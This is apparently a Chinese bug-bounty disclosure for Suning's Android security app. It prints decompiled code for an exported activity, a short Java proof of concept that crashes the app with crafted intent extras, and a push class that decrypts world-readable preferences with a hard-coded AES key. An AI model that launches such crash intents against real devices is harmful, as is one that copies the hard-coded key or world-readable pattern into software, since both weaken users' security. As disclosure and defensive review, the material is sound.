2015-09-23: 细节已通知厂商并且等待厂商处理中 2015-09-23: 厂商已经确认,细节仅向厂商公开 2015-09-26: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航) 2015-11-17: 细节向核心白帽子及相关领域专家公开 2015-11-27: 细节向普通白帽子公开 2015-12-07: 细节向实习白帽子公开 2015-12-22: 细节向公众公开
Android苏宁安全是一款免费的手机安全软件,集手机防盗、防垃圾短信,防骚扰电话功能于一身,为您带来全方位。。。。。。。。
由于组件com.suning.phonesecurity.firewall.NameEditorActivity暴露
/**
 * Decompiled onCreate of NameEditorActivity (obfuscated field names; the
 * goto/label statements are decompiler artefacts, not compilable Java).
 *
 * Everything read from getIntent() below (data URI, action, the "blocktype"
 * extra and the extra named by its value) is supplied by whoever started the
 * activity. The page states the component is exported, so those values must
 * be treated as untrusted input.
 *
 * @param arg4 the Bundle passed to super.onCreate(); it is only consulted in
 *             the final restore block, never for the Intent-derived fields.
 */
protected void onCreate(Bundle arg4) {
    super.onCreate(arg4);
    this.n = this.getIntent();
    // Fall back to a default data URI (ak.a, defined elsewhere) when the caller gave none.
    if(this.n.getData() == null) {
        this.n.setData(ak.a);
    }
    this.m = this.n.getAction();
    this.e = this.n.getStringExtra("blocktype");
    // A missing "blocktype" is handled: log and close the activity.
    if(this.e == null) {
        a.a("NameEditor", "No block type, exiting");
        this.finish();
        return;
    }
    // The caller-supplied blocktype value is reused as the NAME of a second extra,
    // so the caller controls both the key and the value read here.
    this.o = this.n.getStringExtra(this.e);
    a.a("NameEditor", "mBlocktype:" + this.e);
    ActionBar v0 = this.getActionBar();
    if(v0 != null) {
        // 12 == ActionBar.DISPLAY_HOME_AS_UP | ActionBar.DISPLAY_SHOW_TITLE
        v0.setDisplayOptions(12);
    }
    // Layout selection by block type. The contents of NameEditorActivity.a[] are
    // not shown on the page: a[1]/a[3] -> label_50, a[0]/a[2] -> label_83,
    // anything else -> the first branch below.
    if(this.e.equals(NameEditorActivity.a[1])) {
        goto label_50;
    }
    if(this.e.equals(NameEditorActivity.a[3])) {
        goto label_50;
    }
    if(this.e.equals(NameEditorActivity.a[0])) {
        goto label_83;
    }
    if(!this.e.equals(NameEditorActivity.a[2])) {
        // Reached for ANY blocktype string that matches none of a[0..3]; there is
        // no rejection of unknown block types in the code shown.
        this.setContentView(2130968595);
        this.d = this.findViewById(2131427471);
        this.d.addTextChangedListener(this.q);
        // Pre-fill the editor with the caller-supplied extra value.
        if(!TextUtils.isEmpty(this.o)) {
            this.d.setText(this.o);
        }
        this.j = this.findViewById(2131427474);
        this.k = this.findViewById(2131427472);
        this.l = this.findViewById(2131427473);
    }
    else {
    label_83:
        // R.layout.activity_number_editor
        this.setContentView(2130968597);
        this.d = this.findViewById(2131427479);
        this.d.addTextChangedListener(this.q);
        this.d.addTextChangedListener(new PhoneNumberFormattingTextWatcher());
        goto label_58;
    label_50:
        // R.layout.activity_patternnum_editor
        this.setContentView(2130968599);
        this.d = this.findViewById(2131427488);
        this.d.addTextChangedListener(this.q);
    }
label_58:
    // Only INSERT and EDIT are accepted. Note this check runs AFTER the layout
    // has already been inflated from caller-controlled input.
    if(!"android.intent.action.INSERT".equals(this.m) && !"android.intent.action.EDIT".equals(this
            .m)) {
        a.a("NameEditor", "Unknown action, exiting");
        this.finish();
        return;
    }
    // Restore block: these reads come from arg4 (the onCreate Bundle), not from
    // the Intent extras in this.n.
    // NOTE(review): the report names the three Boolean conversions below as the
    // crash site. As far as I know, Bundle.getBoolean() on a key holding another
    // type logs a warning and returns false rather than throwing, and extras put
    // on the launching Intent do not populate this Bundle. The excerpt therefore
    // does not establish where the exception is raised; confirm against the
    // crash stack trace before deciding where to harden.
    // Mitigation that does not depend on the crash site: mark the activity
    // android:exported="false" (or protect it with a permission) if other apps
    // have no need to start it, and validate blocktype against the known set.
    if(arg4 != null) {
        this.f = arg4.getString("origContent");
        this.g = Boolean.valueOf(arg4.getBoolean("origPattern"));
        this.h = Boolean.valueOf(arg4.getBoolean("origCall"));
        this.i = Boolean.valueOf(arg4.getBoolean("origSms"));
    }
}
其中这三个转换 this.g = Boolean.valueOf(arg4.getBoolean("origPattern")); this.h = Boolean.valueOf(arg4.getBoolean("origCall")); this.i = 
Boolean.valueOf(arg4.getBoolean("origSms"));传入异常数据,即可产生拒绝服务
另外
package com.suning.cloud.push.pushservice.b;

// Excerpt of a decompiled private constructor (obfuscated names). It loads the
// "content" string from the "<package>.push_sync" shared preferences, Base64-decodes
// it and decrypts it with AES using a key embedded in the code. The page truncates
// the listing inside the try block, so the catch clause and the rest of the
// constructor are not shown.
private b(Context arg7) {
    Iterator v2_1;
    super();
    this.a = new ArrayList();
    this.e = new HashMap();
    this.d = arg7.getApplicationContext();
    b.b(this.d);
    // Mode 1 == Context.MODE_WORLD_READABLE: the preferences file is opened in the
    // mode that lets other apps on the device read it. Context.MODE_PRIVATE (0) is
    // the safe choice for data that is meant to be confidential.
    String v1 = this.d.getSharedPreferences(String.valueOf(this.d.getPackageName()) + ".push_sync", 1).getString("content", "");
    if(!TextUtils.isEmpty(((CharSequence)v1))) {
        try {
            // Flag 0 == Base64.DEFAULT. getBytes() without a charset uses the platform default.
            byte[] v1_2 = Base64.decode(v1.getBytes(), 0);
            // The AES key is a string literal compiled into the APK, so it is identical
            // on every install and recoverable by anyone who can read the app's code.
            // Together with the world-readable mode above, the encryption gives the
            // stored blob no real confidentiality. A per-device key generated and held
            // in the Android Keystore avoids shipping key material in the binary.
            SecretKeySpec v4 = new SecretKeySpec("9876543210123456".getBytes(), "AES");
            // No mode or padding is named, so the provider default applies.
            // NOTE(review): that default is commonly ECB; confirm for the target
            // provider. No IV and no integrity check appear in this excerpt.
            Cipher v3 = Cipher.getInstance("AES");
            // 2 == Cipher.DECRYPT_MODE
            v3.init(2, ((Key)v4));
            String v2 = new String(v3.doFinal(v1_2));
            // When h.f() is true the decrypted plaintext is written to logcat.
            // h.f() is not shown; presumably a debug switch. Verify it is off in
            // release builds, since log output can be captured on the device.
            if(h.f()) {
                Log.i(b.b, "init : " + v2);
            }
固定秘钥是很危险的。
/**
 * Reproduction case from the report: starts the exported
 * {@code NameEditorActivity} with an explicit intent built by a caller
 * outside the target app.
 *
 * <p>The intent carries an accepted action, a {@code blocktype} extra, an extra
 * named after that blocktype value (the activity looks the second extra up by
 * the value of the first), and an {@code origCall} extra holding a String.
 * Kept as a regression check: once the activity is no longer exported, or its
 * input handling is hardened, the start must be refused or handled without the
 * target process crashing.
 *
 * @param context context used to start the activity
 */
public static void NameEditorActivity_poc(Context context){
    final String targetPackage = "com.suning.phonesecurity";
    final String targetActivity = "com.suning.phonesecurity.firewall.NameEditorActivity";

    // Intent's setters return the same Intent, so the request is assembled in one
    // chain, in the same order as the report's listing.
    Intent launch = new Intent()
            .setClassName(targetPackage, targetActivity)
            .setAction("android.intent.action.INSERT")
            .putExtra("blocktype", "whitelist")
            .putExtra("whitelist", "xxoo")
            .putExtra("origCall", "xxxx");

    context.startActivity(launch);
}
加 try/catch。就冲着“感谢提交,移动客户端拒绝服务漏洞一律按照200元礼品卡计算”来的。
危害等级:低
漏洞Rank:1
确认时间:2015-09-23 15:14
感谢提交,请将安全漏洞提交至http://
暂无